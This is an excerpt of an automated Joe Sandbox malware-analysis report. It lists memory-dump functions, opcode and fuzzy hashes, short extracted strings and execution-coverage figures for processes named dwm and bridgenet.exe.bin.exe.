Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction ID: 1495345512d9913066ee7aef0bf2c4060e277f46f46922c0ca8dc198698361a3
Opcode Fuzzy Hash: 386564d7a5ce44bf9b6c78c5377d2f8ba8a62bb13c0ab21574bf5c3319deb541
Instruction Fuzzy Hash: 97E01A21E4C41747FB94A694D8407BD6271FB84384F1861B8E94FA33C6EE38AE45CB15

Function 00007FF887D6A330 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF887D6A2A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF887D61D40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF887D6B5B8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593bc822e52f18a3febb77109198debad18a33f0af443626aab64500df5f64d2
Instruction ID: bffbdc745603135e5492ebcfd8e3d9d02bbbfaa0aa748f32f32b8d6c7e9db9dc
Opcode Fuzzy Hash: 593bc822e52f18a3febb77109198debad18a33f0af443626aab64500df5f64d2
Instruction Fuzzy Hash: 54D02230B948000F8B0CA738884883433A0EB6A20278000A8E00BC72B1D96AEC88C781

Function 00007FF887D66D68 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction ID: d5ed12c32eaec457ebb9ff4ee8ca2419b3863d361682079ec1126d354d4eeb27
Opcode Fuzzy Hash: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction Fuzzy Hash: 90D01234BA09044F870CAA38885987473A1EB6A61679541A9E00BCB2B5D96AEC89C781

Function 00007FF887D30CEE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction ID: dd6242d04ce97849c19ce36e6f963bc39dfd5a37c82b12a309747b1590a09e3f
Opcode Fuzzy Hash: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction Fuzzy Hash: 0EE01234A4820BCBF700DB94C4845AE7772FB51365F148365C41A8738DEE786684C780

Function 00007FF887D36DA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction ID: ee9e8feb70d153378380fa8e198161fba8e25b3a5c752ca46a9c467e3512a3b3
Opcode Fuzzy Hash: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction Fuzzy Hash: 0DD05E10D4C0034BFB54425494503B923B1AF55384F1812B9E90E932D5EE28AC02C614

Function 00007FF887D44D2D Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d40000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9e3cfeae857f2a54906b5c84058d06516ccade5f3cce09c3d34bb0ebc296b2
Instruction ID: 4561ce1efa857dba0b15e868a44dc4cdf6ef8404e5f99c51443ee39ed9e67e29
Opcode Fuzzy Hash: cd9e3cfeae857f2a54906b5c84058d06516ccade5f3cce09c3d34bb0ebc296b2
Instruction Fuzzy Hash: 8ED0C93094C95B8FFA89EA08D440BAD33B1BF04385F000970E80ED31DBDE68A892C741

Function 00007FF887D306A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction ID: 3c8c7a12f46d040b177e6fa5b4f15f9ad65f30043e1dc96452920b4aa72fdaeb
Opcode Fuzzy Hash: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction Fuzzy Hash: 7BC08C00EDA90F03B40471AE14020ACA122BBC4294FE80372C55F400CDFC0D20C5C196

Function 00007FF887D6BC60 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063f168096da3e07b326ba71bd6d103cefc2a7665e2eeff64bbe61893a5e4bad
Instruction ID: 134ff038b16ac3a5debbadf378629eb73313cfdcf543302f682dd8ed702abee2
Opcode Fuzzy Hash: 063f168096da3e07b326ba71bd6d103cefc2a7665e2eeff64bbe61893a5e4bad
Instruction Fuzzy Hash: 4DC08040CD988A55D8187175185357874F0FF45360FCA0274F40D410D7EC0D248842C7

Function 00007FF887D48729 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d40000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65547928e0a50350be70e74bd34f565d699fdc7dfbecf0831ab40437f981688
Instruction ID: ed53f0d82fc899826dfc675ea863d38c11ad370ec8380a4b9705f52df407997b
Opcode Fuzzy Hash: d65547928e0a50350be70e74bd34f565d699fdc7dfbecf0831ab40437f981688
Instruction Fuzzy Hash: 50D0C930D045188EDBA0EA54C84079876B1BF04301F5041F6840ED3286CB39AD40CF60

Function 00007FF887D35472 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe8d408d8f77f1a9986046aafad543e02aabe688da3ed0eb394959cd87f1fff
Instruction ID: c0f867ddb9547d6c5ae88ed54adb826c1ad034308664a790de670b0f6a602572
Opcode Fuzzy Hash: afe8d408d8f77f1a9986046aafad543e02aabe688da3ed0eb394959cd87f1fff
Instruction Fuzzy Hash: 1FC08C01F18C1742F1052298441027F08129B40B40F408034E02FC62CFCF0C5A0242C3

Function 00007FF887D306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction ID: 4e506ea6fed3011a212eaa031edcb949e7b7c182204628fb5be02b2d35d2b1fa
Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: 44B01200CE644F01B40831BE084206D7060BB44148FD402B0D84E40089F84D10D44292

Function 00007FF887D6AB4A Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964dbadd2ec588eb4cc4d91b7d9fc43cb5a1b396cb706cec7abd4c7aa22b15a6
Instruction ID: 1b77c79c96c8597be0e9ddc115c092183d74075ec850a7222dcdc1b8c86bc125
Opcode Fuzzy Hash: 964dbadd2ec588eb4cc4d91b7d9fc43cb5a1b396cb706cec7abd4c7aa22b15a6
Instruction Fuzzy Hash: 4EB01251E4484F0BB1C8642C10492FA12D3F7B8581B410234A00EC31CFFC0478524140

Non-executed Functions

Function 00007FF887D54694 Relevance: 16.4, Strings: 13, Instructions: 190COMMON

Download Yara Rule

Strings

XEL, xrefs: 00007FF887D54767
XEL, xrefs: 00007FF887D5478A
XEL, xrefs: 00007FF887D54695
XEL, xrefs: 00007FF887D54816
XEL, xrefs: 00007FF887D547F3
XEL, xrefs: 00007FF887D546FE
XEL, xrefs: 00007FF887D546DB
XEL, xrefs: 00007FF887D54839
XEL, xrefs: 00007FF887D54721
XEL, xrefs: 00007FF887D546B8
XEL, xrefs: 00007FF887D547AD
XEL, xrefs: 00007FF887D547D0
XEL, xrefs: 00007FF887D54744

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID: XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL
API String ID: 0-1101732248
Opcode ID: 8d75d630b90ea973ae054abf8c399000e1e9090dd336851b5016d684db75be86
Instruction ID: 768766a15f36f29f24d4158182e76a936788b1c1c27264f34ffa4431e4c5e757
Opcode Fuzzy Hash: 8d75d630b90ea973ae054abf8c399000e1e9090dd336851b5016d684db75be86
Instruction Fuzzy Hash: 3341B466F18C5D4BE9A9A6AC542A3BC63F1FB98AD2381027AC01FC32D6DD1D5C1343C2

Function 00007FF887D309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FF887D30B46
!k9, xrefs: 00007FF887D30B4E
#{9, xrefs: 00007FF887D30B3E
c9, xrefs: 00007FF887D30B56

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: ae7be4d54837d34b414f37624e6a89064ea4a20349e4b17eea158ee605b9f326
Instruction ID: cc622070d3f773a016e1edc4b06f745d8038eabbb8addafcbf291706f69c27a8
Opcode Fuzzy Hash: ae7be4d54837d34b414f37624e6a89064ea4a20349e4b17eea158ee605b9f326
Instruction Fuzzy Hash: 88416C07E485A795E11132FEF0122ED6B549F812B9B084677E17E89183CD0CB987C6F6

Analysis Process: bridgenet.exe.bin.exePID: 3240, Parent PID: 3504COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	91.7%
Signature Coverage:	0%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887D40F72 Relevance: 11.4, Strings: 8, Instructions: 1365COMMON

Download Yara Rule

Strings

p[D, xrefs: 00007FF887D41988
}D, xrefs: 00007FF887D41210
0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5
p[D, xrefs: 00007FF887D419AA

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$ }D$0#L$0#L$0#L$0#L$p[D$p[D
API String ID: 0-326778460
Opcode ID: b231381fe42efcc412eca53650cfc08f79d5c7500e00a515b08d3aed87bf6256
Instruction ID: e32ecb649c70bc512d2b7a0a1863b79735d104f18e0a1e3917338e69a169c99d
Opcode Fuzzy Hash: b231381fe42efcc412eca53650cfc08f79d5c7500e00a515b08d3aed87bf6256
Instruction Fuzzy Hash: 34A29431E9895A8FEA98EB18D4557BC73F1FF64380F1446B9C01EC329ADD29AC82C741

Function 00007FF887D414C5 Relevance: 9.8, Strings: 7, Instructions: 1064COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
E, xrefs: 00007FF887D41540
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
8hD, xrefs: 00007FF887D41581
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$ E$0#L$0#L$0#L$0#L$8hD
API String ID: 0-3979987510
Opcode ID: 08150b2c1f8b74556c5beddf76c0c53a0b0bc05f8b5098afa4c2cd627cb64137
Instruction ID: 1224c0904080ff58cbd3439fed7cf63dcabe8af0c5d0546071ef38d4ed4a44fa
Opcode Fuzzy Hash: 08150b2c1f8b74556c5beddf76c0c53a0b0bc05f8b5098afa4c2cd627cb64137
Instruction Fuzzy Hash: FD726431E9895A8FEA98EB18D4557B873F1FF94390F1446B9D00EC329ADD39AC82C741

Function 00007FF887D41461 Relevance: 7.3, Strings: 5, Instructions: 1014COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 93172e03fd83db286c61f842a9d788589486eed16b673c93b0fef4b2415d21a4
Instruction ID: b4eeaedffdc444a141efb8b8cb546fff1b7dfcfa5f480ed988283c862398f1c2
Opcode Fuzzy Hash: 93172e03fd83db286c61f842a9d788589486eed16b673c93b0fef4b2415d21a4
Instruction Fuzzy Hash: E5627431E9895A8FEA98EB18D4557B873F1FF94390F1442B9D01EC329ADD39AC82C741

Function 00007FF887D412AB Relevance: 7.2, Strings: 5, Instructions: 981COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 9fd6172eb53da027d174466c540b1774eb56a9ebf040c4e74843d0e348c424b0
Instruction ID: 101e9fd04ba948c6ac4f2e48c42d615eb6d961107cec69589c776bd3adc82ec7
Opcode Fuzzy Hash: 9fd6172eb53da027d174466c540b1774eb56a9ebf040c4e74843d0e348c424b0
Instruction Fuzzy Hash: F8627531E9895A8FEA98EB18D4517B873F1FF54390F1442B9D01ED329ADD39AC82C741

Function 00007FF887D41424 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 65754140f67f515c80053620ac600e01292ff969e8bb306057f446cc705e0985
Instruction ID: d63016026bc1ef631a6b23bd1866a6a9d135f22d00356f1da069b95213e54141
Opcode Fuzzy Hash: 65754140f67f515c80053620ac600e01292ff969e8bb306057f446cc705e0985
Instruction Fuzzy Hash: E3627531E9895A8FEA98EB18D4517B873F1FF94390F1442B9D01ED329ADD39AC82C741

Function 00007FF887D413E0 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: c084bb0c8749448a35e3b50efc612cc65f6ef7be7db74a929f9bb280e3a38f22
Instruction ID: 3ab3c7d525a4196be2e051ace2673db756a7bc268d898f28a59993636ce3d29d
Opcode Fuzzy Hash: c084bb0c8749448a35e3b50efc612cc65f6ef7be7db74a929f9bb280e3a38f22
Instruction Fuzzy Hash: F9627531E9895A8FEA98EB18D4517B873F1FF94390F1442B9D01ED329ADD39AC82C741

Function 00007FF887D4139C Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 06aacf7623eaa2984fa05b1def0572298e9340441210877f17e827333039e134
Instruction ID: 6c28ddb2bde4656867deef2193950cbc0a6c8b7479b7afe7a2d32acf7e464ec0
Opcode Fuzzy Hash: 06aacf7623eaa2984fa05b1def0572298e9340441210877f17e827333039e134
Instruction Fuzzy Hash: 10627531E9895A8FEA98EB18D4517B873F1FF94390F1442B9D01ED329ADD39AC82C741

Function 00007FF887D41358 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 4fe5cc50805ae0cf3cf20b9cc1f4546f65d64a2f74ca315b3e011b87ecdaca61
Instruction ID: db882ba0945ce46c4b68aef7d5832f43660b87d9f465ba0a29af18a4ba0aa31c
Opcode Fuzzy Hash: 4fe5cc50805ae0cf3cf20b9cc1f4546f65d64a2f74ca315b3e011b87ecdaca61
Instruction Fuzzy Hash: 3D627531E9895A8FEA98EB18D4517B873F1FF94390F1442B9D01ED329ADD39AC82C741

Function 00007FF887D41314 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: 874f35fb356fc62b2276f511cd17a1aa3433e18dd207c589caf3191491404a47
Instruction ID: 2f01b66958bd01646f6862ade1e0f81c07caaed841076412c69327b522d549ab
Opcode Fuzzy Hash: 874f35fb356fc62b2276f511cd17a1aa3433e18dd207c589caf3191491404a47
Instruction Fuzzy Hash: 0D627531E9895A8FEA98EB18D4517B873F1FF94390F1442B9D01ED329ADD39AC82C741

Function 00007FF887D412D0 Relevance: 7.2, Strings: 5, Instructions: 978COMMON

Download Yara Rule

Strings

0#L, xrefs: 00007FF887D42487
0#L, xrefs: 00007FF887D41C3C
6B, xrefs: 00007FF887D42453
0#L, xrefs: 00007FF887D41C11
0#L, xrefs: 00007FF887D424B5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: 6B$0#L$0#L$0#L$0#L
API String ID: 0-3346519923
Opcode ID: b11fc342330d4a3d58cf121e7ff62b39f9bb957d85c13d477ead06c3ffc80cbb
Instruction ID: b0d25f70812b364ddec58a838abc4226d8c14fb33f2991b93c436fb7c555492c
Opcode Fuzzy Hash: b11fc342330d4a3d58cf121e7ff62b39f9bb957d85c13d477ead06c3ffc80cbb
Instruction Fuzzy Hash: C0627531E9895A8FEA98EB18D4517B873F1FF94390F1442B9D01ED329ADD39AC82C741

Function 00007FF887D30D48 Relevance: 6.5, Strings: 5, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"9B, xrefs: 00007FF887D30DD1
b4B, xrefs: 00007FF887D30F17
r6B, xrefs: 00007FF887D30EC5
r6B, xrefs: 00007FF887D30EA7
5[_H, xrefs: 00007FF887D30DF3

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID: "9B$5[_H$b4B$r6B$r6B
API String ID: 0-1423679481
Opcode ID: c9f4499b32737d21fc0ebb8f5b7b3ae2b4b9da41fdf5cb0e541322678200cf89
Instruction ID: 61f3c29ba5c080ad20fe034e0f9cd3681c67d0e95a5c59a7a0770ff6e527e3f8
Opcode Fuzzy Hash: c9f4499b32737d21fc0ebb8f5b7b3ae2b4b9da41fdf5cb0e541322678200cf89
Instruction Fuzzy Hash: 5471D375E18A8A8FE789DB68C8257AD7FF2FB95340F4401BAC01ED72D6DA781815C701

Function 00007FF8880D4CE4 Relevance: 2.9, Strings: 2, Instructions: 431
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF8880D4D30
r6B, xrefs: 00007FF8880D4D18

Memory Dump Source

Source File: 00000015.00000002.1727493321.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff8880d0000_bridgenet.jbxd

Similarity

API ID:
String ID: r6B$r6B
API String ID: 0-2860294223
Opcode ID: 571661becee16d199a11344d81551f770543cc17348c15ee62c111079f936347
Instruction ID: 03bf8bc06d1493ce5959facb93ce48ccd8221408ac2073174e07cd1ae17320ea
Opcode Fuzzy Hash: 571661becee16d199a11344d81551f770543cc17348c15ee62c111079f936347
Instruction Fuzzy Hash: 4CD1B030E58D594BEB98EB2894956B873E1FF99390F4402B9D40EC72D7DE346C42CB85

Function 00007FF887D610E5 Relevance: 1.7, Strings: 1, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF887D61161

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: 0c5c18923490f29eb6ff362c0ea2a65271af5f5a8e82660d09ee544ff39121a5
Instruction ID: 465f7f13b3874c57f90cafff58063bab8cd728642a8875513d6f5966bad1dbb7
Opcode Fuzzy Hash: 0c5c18923490f29eb6ff362c0ea2a65271af5f5a8e82660d09ee544ff39121a5
Instruction Fuzzy Hash: 13C18C319AD6960BE31D89684C830B977A1FF92345B28937DDDDB8348BED19B407C2C2

Function 00007FF887D7732A Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FF887D7929F

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 1e82c6d56170a0ad8f3737788d1e2ec0823a2d583a3d31c7897c12f19058e00c
